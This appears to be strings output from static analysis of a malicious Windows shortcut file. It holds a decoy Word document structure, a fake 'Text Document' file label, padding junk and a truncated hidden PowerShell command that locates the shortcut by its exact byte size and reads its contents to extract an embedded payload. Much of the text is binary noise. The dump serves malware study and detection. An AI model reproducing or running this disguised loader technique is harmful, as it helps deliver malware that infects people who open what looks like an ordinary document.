Static Analysis

%windir%\system32\cmd.exe

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

_rels/.rels

bmO6P

word/_rels/document.xml.rels

word/document.xml

4<V%@C7

cDys'-

\uc" o!oAM

$PP: %

"3L>&!

ijWNDH

JmBi3A

p#7#/wR5

7Zm#G2

word/numbering.xml

word/styles.xml

[Content_Types].xml

_rels/.relsPK

word/_rels/document.xml.relsPK

word/document.xmlPK

word/numbering.xmlPK

word/styles.xmlPK

[Content_Types].xmlPK

vmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhcccccccccsddddvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhcccccccccsddddvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhcccccccccsddddvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhcccccccccsddddvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhcccccccccsddddvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhvmsdfkjvlasdofjsdfjkgjblsdfefrkjsdfsjkhcccccccccsddddvmsd

AType: Text Document

Size: 5.23 KB

Date modified: 01/02/2020 11:23

/c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = '%temp%';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x00103CFB) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $

.\123.docx

%windir%\system32\cmd.exe